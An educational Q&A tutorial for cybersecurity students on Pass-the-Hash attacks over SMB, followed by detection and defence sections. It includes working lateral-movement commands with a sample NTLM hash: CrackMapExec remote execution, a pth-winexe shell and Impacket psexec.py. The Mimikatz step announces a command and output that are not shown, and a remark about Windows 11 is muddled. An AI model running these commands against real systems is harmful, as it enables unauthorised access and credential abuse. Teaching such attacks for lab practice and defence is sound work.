Pass-the-Hash (PtH) Attacks via SMB: A Complete Q&A Tutorial for Cybersecurity Students

What if cyber experts tell you that attackers don't always need your actual password to break in? With just the hash of the password, hackers can "pass" it directly to SMB and rush into the doors across the network without any obstacles. With a technique called Pass-the-Hash (PtH) via SMB, attackers can reuse stolen NTLM hashes to move across systems, gain admin access, and spread malware—without ever knowing the real password.

So, want to know, how to defend against it? Let's dive in into the tutorial step by step.

What is a Pass-the-Hash (PtH) Attack?

Let's make it simple and clear. Hackers have the tendency of authenticating to a remote service (like SMB) using the hash of a password instead of using the actual password.

Please note:

Instead of cracking a password, the cybercriminals just reuse the NTLM hash and Windows authentication protocols (especially NTLM) allow this.

Real-world analogy:

Imagine, you have to enter your office premises following a key card system. Normally, you need the actual key card (password). But someone finds a way to copy just the magnetic strip data (hash) and reuse it on another card. They never saw the original, but they can still unlock doors.

Why Do Attackers Use SMB for Pass-the-Hash?

• SMB (Server Message Block) is a Windows protocol utilised for file sharing, printer sharing, and inter-process communication.
• SMB often runs on TCP 445, accessible across networks.
• NTLM authentication (used by SMB) accepts password hashes.
• Many organizations still allow SMB internally → perfect for lateral movement.

Remember, if an attacker compromises one system, they can steal hashes and spread across the network with SMB.

What Tools Are Commonly Used for PtH Attacks?

When it comes to penetration testing and cyberattacks, these tools are the go-to weapons:

• Mimikatz: To dump NTLM hashes from memory.
• CrackMapExec (CME): To automate SMB authentication and execution.
• pth-winexe: remote command execution using hashes.
• Impacket Toolkit (Python scripts like psexec.py, wmiexec.py): flexible exploitation.

For this tutorial, Mimikatz + CrackMapExec + pth-winexe shall be focused.

How Do Attackers Get NTLM Hashes in the First Place?

There are several common methods:

1. Local Hash Dumping (Mimikatz, pwdump, secretsdump.py).
   Run on a compromised Windows host.
2. Network Capture (Responder, Inveigh).
   Poisoning LLMNR/NBT-NS to trick victims into sending NTLM hashes.
3. Database Extraction
   Copying the SAM (Security Accounts Manager) file.
4. Credential Dumping Tools
   Sysinternals ProcDump + LSASS dump → analyze with Mimikatz.

Can You Show How to Dump a Hash with Mimikatz?

Yes. On a compromised Windows host (with local admin rights):

After this, you will see output like:

This NTLM hash is what attackers will reuse in the Pass-the-Hash attack.

How Do I Use This Hash in a PtH Attack?

Method 1: CrackMapExec (CME)

Run this on Kali Linux:
crackmapexec smb <target_IP> -u administrator -H 8846f7eaee8fb117ad06bdd830b7586c

If valid, you will see:
[+] Authentication successful

To execute a command remotely:
crackmapexec smb <target_IP> -u administrator -H 8846f7eaee8fb117ad06bdd830b7586c -x "ipconfig"

Method 2: pth-winexe (Direct Shell)

pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c //<target_IP> cmd.exe

• This opens a remote command shell.
• From here, you can browse files, run commands, or dump more credentials.

An essential reminder: The scenario is bit different for Windows 11 operating system. In this case, windows defender is too strong to neutralize the attack automatically.

Method 3: Impacket's psexec.py

psexec.py WIN-SERVER/administrator@<target_IP> -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

• Creates a remote interactive shell.
• Popular among red-teamers because it mimics real attacks closely.

What Happens After a Successful PtH Attack?

• The attacker gains remote admin access.
• Possible next steps:
  • Steal sensitive files.
  • Pivot to other systems.
  • Dump more credentials.
  • Deploy ransomware.

In real-world breaches (e.g., NotPetya ransomware), PtH was key for rapid worm-like spreading.

Why Are PtH Attacks So Dangerous?

• Attackers don't need plaintext passwords.
• Works even if the password is long/complex.
• Reusable across multiple systems if passwords are reused. Very stealthy if not monitored carefully.

How Can I Detect a PtH Attack?

Windows Event Logs

• Event ID 4624 (Logon Success) → NTLM authentication, Logon Type 3 (network).
• Event ID 4625 (Failed Logon) → repeated failed NTLM attempts.

Indicators of Compromise (IOCs)

• Multiple logins from the same hash across different systems.
• Admin accounts logging in from unusual hosts.
• Abnormal SMB session spikes.

Security Tools

• SIEM solutions (Splunk, ELK, Sentinel) with custom rules.
• EDR tools that monitor LSASS access.

How Can I Defend Against Pass-the-Hash?

1. Prevent Hash Theft

• Enable Credential Guard (Windows 10/11).
• Restrict LSASS memory dumping.
• Block tools like Mimikatz via EDR.

2. Limit Hash Reuse

• Implement Local Administrator Password Solution (LAPS) → randomize local admin passwords.
• Don't reuse admin credentials across multiple systems.

3. Reduce Attack Surface

• Restrict or disable NTLM authentication (use Kerberos).
• Limit SMB exposure (block TCP 445 externally).
• Use firewall segmentation between sensitive hosts.

4. Monitor & Alert

• SIEM rules for unusual NTLM logons.
• Detect hash reuse across systems.

What Should Cybersecurity Students Take Away?

• Pass-the-Hash = Real Threat: It's widely used by ransomware gangs and APT groups.
• Practical Skill: Learn to perform PtH in a lab → then learn to detect it in logs.
• Defender's Mindset: Passwords alone aren't enough — securing hashes is critical.

So, Pass-the-Hash isn't just a "lab exercise." It's a real weapon attackers use to leapfrog across networks and bring entire enterprises to their knees. If you can run it in your lab, so can a threat actor in your network. The only difference between a red-team drill and a breach headline is whether you take defense seriously - because hashes are credentials.

Don't just learn the attack. Master the defense. Every hash you protect is one door you keep locked!